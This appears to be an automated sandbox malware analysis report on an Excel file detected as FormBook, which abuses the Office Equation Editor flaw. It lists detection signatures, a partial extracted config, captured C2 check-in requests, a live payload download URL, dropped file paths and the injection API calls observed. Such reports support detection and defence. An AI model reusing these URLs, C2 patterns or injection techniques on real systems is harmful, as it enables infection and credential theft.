Analysis Report Doc_37584567499454.xlsx

Overview

General Information

Sample Name:	Doc_37584567499454.xlsx
Analysis ID:	345175
MD5:	3cee064f8475688e425d7ade676a1598
SHA1:	bad71a575189539a0c57a78cdd24524fe8a2a845
SHA256:	efcc32d3d6d53019b57fbbf107ab622a6374c8d0816c05d1c7687b57c97152e8
Tags:	VelvetSweatshopxlsx
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: CMSTP Execution Process Creation

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a Windows Living Off The Land Binaries (LOL bins)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://medicelcoolers.cn/file2.exe

Avira URL Cloud: Label: malware

Found malware configuration

Source: 10.2.vbc.exe.400000.2.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------

Multi AV Scanner detection for domain / URL

Source: medicelcoolers.cn

Virustotal: Detection: 8%

Perma Link

Multi AV Scanner detection for submitted file

Source: Doc_37584567499454.xlsx

ReversingLabs: Detection: 23%

Yara detected FormBook

Source: Yara match	File source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

Antivirus or Machine Learning detection for unpacked file

Source: 10.2.vbc.exe.400000.2.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Source:	Binary string: wntdll.pdb source: vbc.exe, cmstp.exe
Source:	Binary string: cmstp.pdb source: vbc.exe, 0000000A.00000002.2215893873.0000000000839000.00000004.00000020.sdmp

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 005D0EFDh	4_2_005D0E78
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 005D0EFDh	4_2_005D0E88
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx	10_2_00406A94
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi	10_2_0040C3D7
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi	10_2_0040C3AE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 4x nop then pop edi	12_2_000FC3AE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 4x nop then pop edi	12_2_000FC3D7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 4x nop then pop ebx	12_2_000F6A96

Source: Traffic	Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 185.26.106.165:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 52.209.107.24:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 52.209.107.24:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 52.209.107.24:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 198.185.159.144:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 198.185.159.144:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 198.185.159.144:80

Source: global traffic	HTTP traffic detected: GET /csv8/?l48tdRq0=iJ9LMG7JllwUjj0B/h8Hq4mQMyMQ8EbCXm6EYx1a/TSvaAWcoQp/LBKSuTwaNs+dq810vw==&RF=fra8 HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?l48tdRq0=IHh69a0FaxwHJYII63MYWBmxiBy1jb1SBL9x5Wu2Yyk1poaJdqJtBcBB1goaFgg5VAJZAg==&RF=fra8 HTTP/1.1Host: www.gourmetgroceriesfast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?l48tdRq0=SBCaTdpk9GFN+fS4Ft/T56OwK5/x5qMPVVvaK278SLjI2qusdtII6CngZJh83HH0bt2tCA==&RF=fra8 HTTP/1.1Host: www.stattests.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?l48tdRq0=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&RF=fra8 HTTP/1.1Host: www.brainandbodystrengthcoach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?l48tdRq0=qrM/jq4LcG9rGmd8GV9Oj1wgtu+jolIiSWn3/swEVCZ8jKRp1GYmoG9veOaFoBSGv/vRuA==&RF=fra8 HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?l48tdRq0=f1zFyjN0EmLviNF8fKKCz7YQnzvARTiViS3XLvwk6t41gXJpQ0SRSkWjGn1VRBwYOzEhaA==&RF=fra8 HTTP/1.1Host: www.soundon.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 100.24.208.97 100.24.208.97
Source: Joe Sandbox View	IP Address: 198.185.159.144 198.185.159.144

Source: global traffic	HTTP traffic detected: GET /file2.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: medicelcoolers.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /csv8/?l48tdRq0=iJ9LMG7JllwUjj0B/h8Hq4mQMyMQ8EbCXm6EYx1a/TSvaAWcoQp/LBKSuTwaNs+dq810vw==&RF=fra8 HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?l48tdRq0=IHh69a0FaxwHJYII63MYWBmxiBy1jb1SBL9x5Wu2Yyk1poaJdqJtBcBB1goaFgg5VAJZAg==&RF=fra8 HTTP/1.1Host: www.gourmetgroceriesfast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?l48tdRq0=SBCaTdpk9GFN+fS4Ft/T56OwK5/x5qMPVVvaK278SLjI2qusdtII6CngZJh83HH0bt2tCA==&RF=fra8 HTTP/1.1Host: www.stattests.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?l48tdRq0=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&RF=fra8 HTTP/1.1Host: www.brainandbodystrengthcoach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?l48tdRq0=qrM/jq4LcG9rGmd8GV9Oj1wgtu+jolIiSWn3/swEVCZ8jKRp1GYmoG9veOaFoBSGv/vRuA==&RF=fra8 HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?l48tdRq0=f1zFyjN0EmLviNF8fKKCz7YQnzvARTiViS3XLvwk6t41gXJpQ0SRSkWjGn1VRBwYOzEhaA==&RF=fra8 HTTP/1.1Host: www.soundon.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E03BC NtQueryInformationProcess,	4_2_002E03BC
Source: C:\Users\Public\vbc.exe	Code function: 10_2_004181C0 NtCreateFile,	10_2_004181C0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00418270 NtReadFile,	10_2_00418270
Source: C:\Users\Public\vbc.exe	Code function: 10_2_004182F0 NtClose,	10_2_004182F0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_004183A0 NtAllocateVirtualMemory,	10_2_004183A0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_004181BA NtCreateFile,	10_2_004181BA
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041826A NtReadFile,	10_2_0041826A
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009300C4 NtCreateFile,LdrInitializeThunk,	10_2_009300C4
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00930048 NtProtectVirtualMemory,LdrInitializeThunk,	10_2_00930048
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00930078 NtResumeThread,LdrInitializeThunk,	10_2_00930078
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009307AC NtCreateMutant,LdrInitializeThunk,	10_2_009307AC
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092F9F0 NtClose,LdrInitializeThunk,	10_2_0092F9F0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092F900 NtReadFile,LdrInitializeThunk,	10_2_0092F900
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_0092FAD0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FAE8 NtQueryInformationProcess,LdrInitializeThunk,	10_2_0092FAE8
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FBB8 NtQueryInformationToken,LdrInitializeThunk,	10_2_0092FBB8
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FB68 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_0092FB68
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FC90 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_0092FC90
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FC60 NtMapViewOfSection,LdrInitializeThunk,	10_2_0092FC60
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FD8C NtDelayExecution,LdrInitializeThunk,	10_2_0092FD8C
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FDC0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_0092FDC0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FEA0 NtReadVirtualMemory,LdrInitializeThunk,	10_2_0092FEA0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_0092FED0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FFB4 NtCreateSection,LdrInitializeThunk,	10_2_0092FFB4
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009310D0 NtOpenProcessToken,	10_2_009310D0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00930060 NtQuerySection,	10_2_00930060
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009301D4 NtSetValueKey,	10_2_009301D4
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0093010C NtOpenDirectoryObject,	10_2_0093010C
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00931148 NtOpenThread,	10_2_00931148
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092F8CC NtWaitForSingleObject,	10_2_0092F8CC
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00931930 NtSetContextThread,	10_2_00931930
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092F938 NtWriteFile,	10_2_0092F938
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FAB8 NtQueryValueKey,	10_2_0092FAB8
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FA20 NtQueryInformationFile,	10_2_0092FA20
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FA50 NtEnumerateValueKey,	10_2_0092FA50
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FBE8 NtQueryVirtualMemory,	10_2_0092FBE8
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FB50 NtCreateKey,	10_2_0092FB50
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FC30 NtOpenProcess,	10_2_0092FC30
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00930C40 NtGetContextThread,	10_2_00930C40
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FC48 NtSetInformationFile,	10_2_0092FC48
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00931D80 NtSuspendThread,	10_2_00931D80
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FD5C NtEnumerateKey,	10_2_0092FD5C
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FE24 NtWriteVirtualMemory,	10_2_0092FE24
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FFFC NtCreateProcessEx,	10_2_0092FFFC
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0092FF34 NtQueueApcThread,	10_2_0092FF34
Source: C:\Users\Public\vbc.exe	Code function: 10_2_002067C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,	10_2_002067C7
Source: C:\Users\Public\vbc.exe	Code function: 10_2_002067C2 NtQueryInformationProcess,	10_2_002067C2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F400C4 NtCreateFile,LdrInitializeThunk,	12_2_01F400C4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F407AC NtCreateMutant,LdrInitializeThunk,	12_2_01F407AC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3F9F0 NtClose,LdrInitializeThunk,	12_2_01F3F9F0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3F900 NtReadFile,LdrInitializeThunk,	12_2_01F3F900
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FBB8 NtQueryInformationToken,LdrInitializeThunk,	12_2_01F3FBB8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FB68 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_01F3FB68
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FB50 NtCreateKey,LdrInitializeThunk,	12_2_01F3FB50
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FAE8 NtQueryInformationProcess,LdrInitializeThunk,	12_2_01F3FAE8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_01F3FAD0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FAB8 NtQueryValueKey,LdrInitializeThunk,	12_2_01F3FAB8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FDC0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_01F3FDC0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FD8C NtDelayExecution,LdrInitializeThunk,	12_2_01F3FD8C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FC60 NtMapViewOfSection,LdrInitializeThunk,	12_2_01F3FC60
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FFB4 NtCreateSection,LdrInitializeThunk,	12_2_01F3FFB4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	12_2_01F3FED0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F401D4 NtSetValueKey,	12_2_01F401D4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F41148 NtOpenThread,	12_2_01F41148
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F4010C NtOpenDirectoryObject,	12_2_01F4010C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F410D0 NtOpenProcessToken,	12_2_01F410D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F40078 NtResumeThread,	12_2_01F40078
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F40060 NtQuerySection,	12_2_01F40060
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F40048 NtProtectVirtualMemory,	12_2_01F40048
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F41930 NtSetContextThread,	12_2_01F41930
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3F938 NtWriteFile,	12_2_01F3F938
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3F8CC NtWaitForSingleObject,	12_2_01F3F8CC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FBE8 NtQueryVirtualMemory,	12_2_01F3FBE8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FA50 NtEnumerateValueKey,	12_2_01F3FA50
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FA20 NtQueryInformationFile,	12_2_01F3FA20
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F41D80 NtSuspendThread,	12_2_01F41D80
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FD5C NtEnumerateKey,	12_2_01F3FD5C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FC90 NtUnmapViewOfSection,	12_2_01F3FC90
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F40C40 NtGetContextThread,	12_2_01F40C40
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FC48 NtSetInformationFile,	12_2_01F3FC48
